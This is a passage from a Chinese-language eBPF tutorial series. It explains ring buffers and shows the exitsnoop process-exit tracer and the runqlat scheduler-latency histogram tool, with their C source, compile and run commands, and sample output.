21:28:30 40747 3517 1000 node
|
||
21:28:30 40748 40747 1000 sh
|
||
21:28:30 40749 3517 1000 node
|
||
21:28:30 40750 40749 1000 sh
|
||
21:28:30 40751 3517 1000 node
|
||
21:28:30 40752 40751 1000 sh
|
||
21:28:30 40753 40752 1000 cpuUsage.sh
|
||
</code></pre>
|
||
<h2 id="总结-6"><a class="header" href="#总结-6">总结</a></h2>
|
||
<p>本文介绍了如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。在 libbpf 对应的内核态代码中,定义这样一个结构体和对应的头文件:</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
</code></pre>
|
||
<p>就可以往用户态直接发送信息。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程八在-ebpf-中使用-exitsnoop-监控进程退出事件使用-ring-buffer-向用户态打印输出"><a class="header" href="#ebpf-入门开发实践教程八在-ebpf-中使用-exitsnoop-监控进程退出事件使用-ring-buffer-向用户态打印输出">eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件。</p>
|
||
<h2 id="ring-buffer"><a class="header" href="#ring-buffer">ring buffer</a></h2>
|
||
<p>现在有一个新的 BPF 数据结构可用:eBPF 环形缓冲区(ring buffer)。它解决了 BPF perf buffer(当今从内核向用户空间发送数据的事实上的标准)的内存效率和事件重排问题,同时达到或超过了它的性能。它既提供了与 perf buffer 兼容的 API 以方便迁移,又有新的保留/提交 API,具有更好的可用性。另外,合成和真实世界的基准测试表明,在几乎所有的情况下,BPF ringbuf 的性能都优于 BPF perfbuf,所以可以考虑将其作为从 BPF 程序向用户空间发送数据的默认选择。</p>
|
||
<h3 id="ebpf-ringbuf-vs-ebpf-perfbuf"><a class="header" href="#ebpf-ringbuf-vs-ebpf-perfbuf">eBPF ringbuf vs eBPF perfbuf</a></h3>
|
||
<p>只要 BPF 程序需要将收集到的数据发送到用户空间进行后处理和记录,它通常会使用 BPF perf buffer(perfbuf)来实现。Perfbuf 是每个CPU循环缓冲区的集合,它允许在内核和用户空间之间有效地交换数据。它在实践中效果很好,但由于其按CPU设计,它有两个主要的缺点,在实践中被证明是不方便的:内存的低效使用和事件的重新排序。</p>
|
||
<p>为了解决这些问题,从 Linux 5.8 开始,BPF 提供了一个新的 BPF 数据结构(BPF map):BPF 环形缓冲区(ringbuf)。它是一个多生产者、单消费者(MPSC)队列,可以同时在多个 CPU 上安全共享。</p>
|
||
<p>BPF ringbuf 支持来自 BPF perfbuf 的熟悉的功能:</p>
|
||
<ul>
|
||
<li>变长的数据记录。</li>
|
||
<li>能够通过内存映射区域有效地从用户空间读取数据,而不需要额外的内存拷贝和/或进入内核的系统调用。</li>
|
||
<li>既支持 epoll 通知,又能以绝对最小的延迟进行忙轮询(busy-loop)。</li>
|
||
</ul>
|
||
<p>同时,BPF ringbuf解决了BPF perfbuf的以下问题:</p>
|
||
<ul>
|
||
<li>内存开销。</li>
|
||
<li>数据排序。</li>
|
||
<li>浪费的工作和额外的数据复制。</li>
|
||
</ul>
|
||
<h2 id="exitsnoop"><a class="header" href="#exitsnoop">exitsnoop</a></h2>
|
||
<p>本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件,并使用 ring buffer 向用户态打印输出。</p>
|
||
<p>使用 ring buffer 向用户态打印输出的步骤和 perf buffer 类似,首先需要定义一个头文件:</p>
|
||
<p>头文件:exitsnoop.h</p>
|
||
<pre><code class="language-c">#ifndef __BOOTSTRAP_H
|
||
#define __BOOTSTRAP_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_FILENAME_LEN 127
|
||
|
||
struct event {
|
||
int pid;
|
||
int ppid;
|
||
unsigned exit_code;
|
||
unsigned long long duration_ns;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
#endif /* __BOOTSTRAP_H */
|
||
</code></pre>
|
||
<p>源文件:exitsnoop.bpf.c</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "exitsnoop.h"
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
SEC("tp/sched/sched_process_exit")
|
||
int handle_exit(struct trace_event_raw_sched_process_template* ctx)
|
||
{
|
||
struct task_struct *task;
|
||
struct event *e;
|
||
pid_t pid, tid;
|
||
u64 id, ts, *start_ts, duration_ns = 0;
|
||
|
||
/* get PID and TID of exiting thread/process */
|
||
id = bpf_get_current_pid_tgid();
|
||
pid = id >> 32;
|
||
tid = (u32)id;
|
||
|
||
/* ignore thread exits */
|
||
if (pid != tid)
|
||
return 0;
|
||
|
||
/* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->duration_ns = duration_ns;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff;
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
/* send data to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码展示了如何使用 exitsnoop 监控进程退出事件并使用 ring buffer 向用户态打印输出:</p>
|
||
<ol>
|
||
<li>首先,我们引入所需的头文件和 exitsnoop.h。</li>
|
||
<li>定义一个名为 "LICENSE" 的全局变量,内容为 "Dual BSD/GPL",这是 eBPF 程序的许可证要求。</li>
|
||
<li>定义一个名为 rb 的 BPF_MAP_TYPE_RINGBUF 类型的映射,它将用于将内核空间的数据传输到用户空间。指定 max_entries 为 256 * 1024,代表 ring buffer 的最大容量。</li>
|
||
<li>定义一个名为 handle_exit 的 eBPF 程序,它将在进程退出事件触发时执行。传入一个名为 ctx 的 trace_event_raw_sched_process_template 结构体指针作为参数。</li>
|
||
<li>使用 bpf_get_current_pid_tgid() 函数获取当前任务的 PID 和 TID。对于主线程,PID 和 TID 相同;对于子线程,它们是不同的。我们只关心进程(主线程)的退出,因此在 PID 和 TID 不同时返回 0,忽略子线程退出事件。</li>
|
||
<li>使用 bpf_ringbuf_reserve 函数为事件结构体 e 在 ring buffer 中预留空间。如果预留失败,返回 0。</li>
|
||
<li>使用 bpf_get_current_task() 函数获取当前任务的 task_struct 结构指针。</li>
|
||
<li>将进程相关信息填充到预留的事件结构体 e 中,包括进程持续时间(本示例没有统计该值,duration_ns 始终为 0)、PID、PPID、退出代码以及进程名称。</li>
|
||
<li>最后,使用 bpf_ringbuf_submit 函数将填充好的事件结构体 e 提交到 ring buffer,之后在用户空间进行处理和输出。</li>
|
||
</ol>
|
||
<p>这个示例展示了如何使用 exitsnoop 和 ring buffer 在 eBPF 程序中捕获进程退出事件并将相关信息传输到用户空间。这对于分析进程退出原因和监控系统行为非常有用。</p>
|
||
<h2 id="compile-and-run"><a class="header" href="#compile-and-run">Compile and Run</a></h2>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>Compile:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>Or</p>
|
||
<pre><code class="language-console">$ ecc exitsnoop.bpf.c exitsnoop.h
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>Run:</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json
|
||
TIME PID PPID EXIT_CODE DURATION_NS COMM
|
||
21:40:09 42050 42049 0 0 which
|
||
21:40:09 42049 3517 0 0 sh
|
||
21:40:09 42052 42051 0 0 ps
|
||
21:40:09 42051 3517 0 0 sh
|
||
21:40:09 42055 42054 0 0 sed
|
||
21:40:09 42056 42054 0 0 cat
|
||
21:40:09 42057 42054 0 0 cat
|
||
21:40:09 42058 42054 0 0 cat
|
||
21:40:09 42059 42054 0 0 cat
|
||
</code></pre>
|
||
<h2 id="总结-7"><a class="header" href="#总结-7">总结</a></h2>
|
||
<p>本文介绍了如何使用 eunomia-bpf 开发一个简单的 BPF 程序,该程序可以监控 Linux 系统中的进程退出事件, 并将捕获的事件通过 ring buffer 发送给用户空间程序。在本文中,我们使用 eunomia-bpf 编译运行了这个例子。</p>
|
||
<p>为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。此外,我们还为您提供了完整的教程和源代码,您可以在 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程九捕获进程调度延迟以直方图方式记录"><a class="header" href="#ebpf-入门开发实践教程九捕获进程调度延迟以直方图方式记录">eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。</p>
|
||
<h2 id="runqlat-原理"><a class="header" href="#runqlat-原理">runqlat 原理</a></h2>
|
||
<p>本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。</p>
|
||
<p>Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。</p>
|
||
<p>进程有几种可能的状态,如:</p>
|
||
<ul>
|
||
<li>可运行或正在运行</li>
|
||
<li>可中断睡眠</li>
|
||
<li>不可中断睡眠</li>
|
||
<li>停止</li>
|
||
<li>僵尸进程</li>
|
||
</ul>
|
||
<p>等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。</p>
|
||
<p>即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。</p>
|
||
<p>根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。</p>
|
||
<p>进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。</p>
|
||
<p>我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统:</p>
|
||
<pre><code class="language-shell"># runqlat
|
||
Tracing run queue latency... Hit Ctrl-C to end.
|
||
^C
|
||
usecs : count distribution
|
||
0 -> 1 : 233 |*********** |
|
||
2 -> 3 : 742 |************************************ |
|
||
4 -> 7 : 203 |********** |
|
||
8 -> 15 : 173 |******** |
|
||
16 -> 31 : 24 |* |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 30 |* |
|
||
128 -> 255 : 6 | |
|
||
256 -> 511 : 3 | |
|
||
512 -> 1023 : 5 | |
|
||
1024 -> 2047 : 27 |* |
|
||
2048 -> 4095 : 30 |* |
|
||
4096 -> 8191 : 20 | |
|
||
8192 -> 16383 : 29 |* |
|
||
16384 -> 32767 : 809 |****************************************|
|
||
32768 -> 65535 : 64 |*** |
|
||
</code></pre>
|
||
<p>在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。</p>
|
||
<p>在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱和等方面的知识。</p>
|
||
<p>runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。</p>
|
||
<h2 id="runqlat-代码实现"><a class="header" href="#runqlat-代码实现">runqlat 代码实现</a></h2>
|
||
<h3 id="runqlatbpfc"><a class="header" href="#runqlatbpfc">runqlat.bpf.c</a></h3>
|
||
<p>首先我们需要编写一个源代码文件 runqlat.bpf.c:</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0
|
||
// Copyright (c) 2020 Wenbo Zhang
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "runqlat.h"
|
||
#include "bits.bpf.h"
|
||
#include "maps.bpf.h"
|
||
#include "core_fixes.bpf.h"
|
||
|
||
#define MAX_ENTRIES 10240
|
||
#define TASK_RUNNING 0
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_per_process = false;
|
||
const volatile bool targ_per_thread = false;
|
||
const volatile bool targ_per_pidns = false;
|
||
const volatile bool targ_ms = false;
|
||
const volatile pid_t targ_tgid = 0;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
|
||
__type(key, u32);
|
||
__type(value, u32);
|
||
__uint(max_entries, 1);
|
||
} cgroup_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, u64);
|
||
} start SEC(".maps");
|
||
|
||
static struct hist zero;
|
||
|
||
/// @sample {"interval": 1000, "type" : "log2_hist"}
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, struct hist);
|
||
} hists SEC(".maps");
|
||
|
||
static int trace_enqueue(u32 tgid, u32 pid)
|
||
{
|
||
u64 ts;
|
||
|
||
if (!pid)
|
||
return 0;
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&start, &pid, &ts, BPF_ANY);
|
||
return 0;
|
||
}
|
||
|
||
static unsigned int pid_namespace(struct task_struct *task)
|
||
{
|
||
struct pid *pid;
|
||
unsigned int level;
|
||
struct upid upid;
|
||
unsigned int inum;
|
||
|
||
/* get the pid namespace by following task_active_pid_ns(),
|
||
* pid->numbers[pid->level].ns
|
||
*/
|
||
pid = BPF_CORE_READ(task, thread_pid);
|
||
level = BPF_CORE_READ(pid, level);
|
||
bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
|
||
inum = BPF_CORE_READ(upid.ns, ns.inum);
|
||
|
||
return inum;
|
||
}
|
||
|
||
static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
{
|
||
struct hist *histp;
|
||
u64 *tsp, slot;
|
||
u32 pid, hkey;
|
||
s64 delta;
|
||
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
if (get_task_state(prev) == TASK_RUNNING)
|
||
trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid));
|
||
|
||
pid = BPF_CORE_READ(next, pid);
|
||
|
||
tsp = bpf_map_lookup_elem(&start, &pid);
|
||
if (!tsp)
|
||
return 0;
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
if (delta < 0)
|
||
goto cleanup;
|
||
|
||
if (targ_per_process)
|
||
hkey = BPF_CORE_READ(next, tgid);
|
||
else if (targ_per_thread)
|
||
hkey = pid;
|
||
else if (targ_per_pidns)
|
||
hkey = pid_namespace(next);
|
||
else
|
||
hkey = -1;
|
||
histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero);
|
||
if (!histp)
|
||
goto cleanup;
|
||
if (!histp->comm[0])
|
||
bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm),
|
||
next->comm);
|
||
if (targ_ms)
|
||
delta /= 1000000U;
|
||
else
|
||
delta /= 1000U;
|
||
slot = log2l(delta);
|
||
if (slot >= MAX_SLOTS)
|
||
slot = MAX_SLOTS - 1;
|
||
__sync_fetch_and_add(&histp->slots[slot], 1);
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&start, &pid);
|
||
return 0;
|
||
}
|
||
|
||
SEC("raw_tp/sched_wakeup")
|
||
int BPF_PROG(handle_sched_wakeup, struct task_struct *p)
|
||
{
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
|
||
}
|
||
|
||
SEC("raw_tp/sched_wakeup_new")
|
||
int BPF_PROG(handle_sched_wakeup_new, struct task_struct *p)
|
||
{
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
return trace_enqueue(BPF_CORE_READ(p, tgid), BPF_CORE_READ(p, pid));
|
||
}
|
||
|
||
SEC("raw_tp/sched_switch")
|
||
int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
{
|
||
return handle_switch(preempt, prev, next);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这其中定义了一些常量和全局变量,用于过滤对应的追踪目标:</p>
|
||
<pre><code class="language-c">#define MAX_ENTRIES 10240
|
||
#define TASK_RUNNING 0
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_per_process = false;
|
||
const volatile bool targ_per_thread = false;
|
||
const volatile bool targ_per_pidns = false;
|
||
const volatile bool targ_ms = false;
|
||
const volatile pid_t targ_tgid = 0;
|
||
</code></pre>
|
||
<p>这些变量包括最大映射项数量、任务状态、过滤选项和目标选项。这些选项可以通过用户空间程序设置,以定制 eBPF 程序的行为。</p>
|
||
<p>接下来,定义了一些 eBPF 映射:</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
|
||
__type(key, u32);
|
||
__type(value, u32);
|
||
__uint(max_entries, 1);
|
||
} cgroup_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, u64);
|
||
} start SEC(".maps");
|
||
|
||
static struct hist zero;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, u32);
|
||
__type(value, struct hist);
|
||
} hists SEC(".maps");
|
||
</code></pre>
|
||
<p>这些映射包括:</p>
|
||
<ul>
|
||
<li>cgroup_map 用于过滤 cgroup;</li>
|
||
<li>start 用于存储进程入队时的时间戳;</li>
|
||
<li>hists 用于存储直方图数据,记录进程调度延迟。</li>
|
||
</ul>
|
||
<p>接下来是一些辅助函数:</p>
|
||
<p>trace_enqueue 函数用于在进程入队时记录其时间戳:</p>
|
||
<pre><code class="language-c">static int trace_enqueue(u32 tgid, u32 pid)
|
||
{
|
||
u64 ts;
|
||
|
||
if (!pid)
|
||
return 0;
|
||
if (targ_tgid && targ_tgid != tgid)
|
||
return 0;
|
||
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&start, &pid, &ts, BPF_ANY);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>pid_namespace 函数用于获取进程所属的 PID namespace:</p>
|
||
<pre><code class="language-c">static unsigned int pid_namespace(struct task_struct *task)
|
||
{
|
||
struct pid *pid;
|
||
unsigned int level;
|
||
struct upid upid;
|
||
unsigned int inum;
|
||
|
||
/* get the pid namespace by following task_active_pid_ns(),
|
||
* pid->numbers[pid->level].ns
|
||
*/
|
||
pid = BPF_CORE_READ(task, thread_pid);
|
||
level = BPF_CORE_READ(pid, level);
|
||
bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]);
|
||
inum = BPF_CORE_READ(upid.ns, ns.inum);
|
||
|
||
return inum;
|
||
}
|
||
</code></pre>
|
||
<p>handle_switch 函数是核心部分,用于处理调度切换事件,计算进程调度延迟并更新直方图数据:</p>
|
||
<pre><code class="language-c">static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next)
|
||
{
|
||
...
|
||
}
|
||
</code></pre>
|
||
<p>首先,函数根据 filter_cg 的设置判断是否需要过滤 cgroup。然后,如果之前的进程状态为 TASK_RUNNING,则调用 trace_enqueue 函数记录进程的入队时间。接着,函数查找下一个进程的入队时间戳,如果找不到,直接返回。计算调度延迟(delta),并根据不同的选项设置(targ_per_process,targ_per_thread,targ_per_pidns),确定直方图映射的键(hkey)。然后查找或初始化直方图映射,更新直方图数据,最后删除进程的入队时间戳记录。</p>
|
||
<p>接下来是 eBPF 程序的入口点。程序使用三个入口点来捕获不同的调度事件:</p>
|
||
<ul>
|
||
<li>handle_sched_wakeup:用于处理 sched_wakeup 事件,当一个进程从睡眠状态被唤醒时触发。</li>
|
||
<li>handle_sched_wakeup_new:用于处理 sched_wakeup_new 事件,当一个新创建的进程被唤醒时触发。</li>
|
||
<li>handle_sched_switch:用于处理 sched_switch 事件,当调度器选择一个新的进程运行时触发。</li>
|
||
</ul>
|
||
<p>这些入口点分别处理不同的调度事件:handle_sched_wakeup 和 handle_sched_wakeup_new 调用 trace_enqueue 函数记录进程入队的时间戳,handle_sched_switch 则调用 handle_switch 函数来计算进程的调度延迟并更新直方图数据。</p>
|
||
<p>最后,程序包含一个许可证声明:</p>
|
||
<pre><code class="language-c">char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这一声明指定了 eBPF 程序的许可证类型,这里使用的是 "GPL"。这对于许多内核功能是必需的,因为它们要求 eBPF 程序遵循 GPL 许可证。</p>
|
||
<h3 id="runqlath"><a class="header" href="#runqlath">runqlat.h</a></h3>
|
||
<p>然后我们需要定义一个头文件<code>runqlat.h</code>,用来给用户态处理从内核态上报的事件:</p>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
#ifndef __RUNQLAT_H
|
||
#define __RUNQLAT_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_SLOTS 26
|
||
|
||
struct hist {
|
||
__u32 slots[MAX_SLOTS];
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
#endif /* __RUNQLAT_H */
|
||
</code></pre>
|
||
<h2 id="编译运行"><a class="header" href="#编译运行">编译运行</a></h2>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>Compile:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者</p>
|
||
<pre><code class="language-console">$ ecc runqlat.bpf.c runqlat.h
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>Run:</p>
|
||
<pre><code class="language-console">$ sudo ecli run examples/bpftools/runqlat/package.json -h
|
||
Usage: runqlat_bpf [--help] [--version] [--verbose] [--filter_cg] [--targ_per_process] [--targ_per_thread] [--targ_per_pidns] [--targ_ms] [--targ_tgid VAR]
|
||
|
||
A simple eBPF program
|
||
|
||
Optional arguments:
|
||
-h, --help shows help message and exits
|
||
-v, --version prints version information and exits
|
||
--verbose prints libbpf debug information
|
||
--filter_cg set value of bool variable filter_cg
|
||
--targ_per_process set value of bool variable targ_per_process
|
||
--targ_per_thread set value of bool variable targ_per_thread
|
||
--targ_per_pidns set value of bool variable targ_per_pidns
|
||
--targ_ms set value of bool variable targ_ms
|
||
--targ_tgid set value of pid_t variable targ_tgid
|
||
|
||
Built with eunomia-bpf framework.
|
||
See https://github.com/eunomia-bpf/eunomia-bpf for more information.
|
||
|
||
$ sudo ecli run examples/bpftools/runqlat/package.json
|
||
key = 4294967295
|
||
comm = rcu_preempt
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 9 |**** |
|
||
2 -> 3 : 6 |** |
|
||
4 -> 7 : 12 |***** |
|
||
8 -> 15 : 28 |************* |
|
||
16 -> 31 : 40 |******************* |
|
||
32 -> 63 : 83 |****************************************|
|
||
64 -> 127 : 57 |*************************** |
|
||
128 -> 255 : 19 |********* |
|
||
256 -> 511 : 11 |***** |
|
||
512 -> 1023 : 2 | |
|
||
1024 -> 2047 : 2 | |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 0 | |
|
||
8192 -> 16383 : 0 | |
|
||
16384 -> 32767 : 1 | |
|
||
|
||
$ sudo ecli run examples/bpftools/runqlat/package.json --targ_per_process
|
||
key = 3189
|
||
comm = cpptools
|
||
|
||
(unit) : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 0 | |
|
||
8 -> 15 : 1 |*** |
|
||
16 -> 31 : 2 |******* |
|
||
32 -> 63 : 11 |****************************************|
|
||
64 -> 127 : 8 |***************************** |
|
||
128 -> 255 : 3 |********** |
|
||
</code></pre>
|
||
<p>完整源代码请见:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/9-runqlat">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/9-runqlat</a></p>
|
||
<p>参考资料:</p>
|
||
<ul>
|
||
<li><a href="https://www.brendangregg.com/blog/2016-10-08/linux-bcc-runqlat.html">https://www.brendangregg.com/blog/2016-10-08/linux-bcc-runqlat.html</a></li>
|
||
<li><a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.c">https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.c</a></li>
|
||
</ul>
|
||
<h2 id="总结-8"><a class="header" href="#总结-8">总结</a></h2>
|
||
<p>runqlat 是一个 Linux 内核 BPF 程序,通过直方图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。</p>
|
||
<p>runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码:<a href="https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.bpf.c">https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.bpf.c</a></p>
|
||
